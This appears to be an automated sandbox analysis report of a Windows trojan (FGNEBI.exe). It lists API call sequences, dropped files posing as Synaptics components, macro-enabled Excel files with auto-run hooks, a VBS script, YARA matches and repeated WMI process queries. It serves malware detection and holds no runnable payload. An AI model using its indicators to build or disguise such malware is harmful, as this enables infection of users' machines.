                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FAD5C NtdllDialogWndProc_W,74B1C8D0,NtdllDialogWndProc_W,10_2_001FAD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,10_2_0024EFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FAFB4 GetParent,NtdllDialogWndProc_W,10_2_001FAFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F0A1 SendMessageW,NtdllDialogWndProc_W,10_2_0024F0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,10_2_0024F122
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F37C NtdllDialogWndProc_W,10_2_0024F37C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F3AB NtdllDialogWndProc_W,10_2_0024F3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F3DA NtdllDialogWndProc_W,10_2_0024F3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F425 NtdllDialogWndProc_W,10_2_0024F425
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F45A ClientToScreen,NtdllDialogWndProc_W,10_2_0024F45A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F594 GetWindowLongW,NtdllDialogWndProc_W,10_2_0024F594
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0024F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FB7F2 NtdllDialogWndProc_W,10_2_001FB7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FB845 NtdllDialogWndProc_W,10_2_001FB845
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024FE80 NtdllDialogWndProc_W,10_2_0024FE80
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,10_2_0024FF04
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,10_2_0024FF91
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD70AE: CreateFileW,DeviceIoControl,CloseHandle,2_2_00DD70AE
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BC5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_00DCB9F1
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00DD82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_002282D0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DF30AD2_2_00DF30AD
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DA36802_2_00DA3680
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D9DCD02_2_00D9DCD0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D9A0C02_2_00D9A0C0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB01832_2_00DB0183
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD220C2_2_00DD220C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D985302_2_00D98530
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D966702_2_00D96670
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB06772_2_00DB0677
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC87792_2_00DC8779
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFA8DC2_2_00DFA8DC
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB0A8F2_2_00DB0A8F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D96BBC2_2_00D96BBC
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DBAC832_2_00DBAC83
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D98CA02_2_00D98CA0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAAD5C2_2_00DAAD5C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB0EC42_2_00DB0EC4
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC4EBF2_2_00DC4EBF
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC113E2_2_00DC113E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB12F92_2_00DB12F9
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC542F2_2_00DC542F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DFF5D02_2_00DFF5D0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC599F2_2_00DC599F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DBDA742_2_00DBDA74
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D9BDF02_2_00D9BDF0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DBBDF62_2_00DBBDF6
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D95D322_2_00D95D32
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB1E5A2_2_00DB1E5A
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC7FFD2_2_00DC7FFD
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDBFB82_2_00DDBFB8
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DBDF692_2_00DBDF69
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001EDCD010_2_001EDCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001EA0C010_2_001EA0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020018310_2_00200183
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022220C10_2_0022220C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E853010_2_001E8530
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020067710_2_00200677
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E667010_2_001E6670
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021877910_2_00218779
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024A8DC10_2_0024A8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00200A8F10_2_00200A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E6BBC10_2_001E6BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020AC8310_2_0020AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E8CA010_2_001E8CA0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FAD5C10_2_001FAD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00214EBF10_2_00214EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00200EC410_2_00200EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002430AD10_2_002430AD
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021113E10_2_0021113E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002012F910_2_002012F9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021542F10_2_0021542F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0024F5D010_2_0024F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001F368010_2_001F3680
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021599F10_2_0021599F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020DA7410_2_0020DA74
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001E5D3210_2_001E5D32
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020BDF610_2_0020BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001EBDF010_2_001EBDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00201E5A10_2_00201E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0020DF6910_2_0020DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022BFB810_2_0022BFB8
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00217FFD10_2_00217FFD
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: JUIlYPbf.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: GAOBCVIQIJ.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX5CF5.tmp 5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 001FF885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 00207750 appears 42 times
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: String function: 00DAF885 appears 68 times
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: String function: 00DB7750 appears 42 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
                              Source: FGNEBI.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: FGNEBI.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX5CF5.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs FGNEBI.exe
                              Source: FGNEBI.exe, 00000000.00000000.1399766047.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs FGNEBI.exe
                              Source: FGNEBI.exe, 00000000.00000003.1408140312.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs FGNEBI.exe
                              Source: FGNEBI.exe, 00000000.00000003.1408140312.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameX vs FGNEBI.exe
                              Source: FGNEBI.exe, 00000000.00000003.1408098370.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs FGNEBI.exe
                              Source: FGNEBI.exeBinary or memory string: OriginalFileName vs FGNEBI.exe
                              Source: FGNEBI.exeBinary or memory string: OriginalFilenameb! vs FGNEBI.exe
                              Source: FGNEBI.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@24/29@4/4
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDD712 GetLastError,FormatMessageW,2_2_00DDD712
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCB8B0 AdjustTokenPrivileges,CloseHandle,2_2_00DCB8B0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00DCBEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,10_2_0021B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_0021BEC3
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00DDEA85
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00DD6F5B
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_00DDEFCD
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00D931F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\Users\user\Desktop\._cache_FGNEBI.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8036
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeFile created: C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJump to behavior
                              Source: Yara matchFile source: FGNEBI.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
                              Source: C:\Users\user\Desktop\FGNEBI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
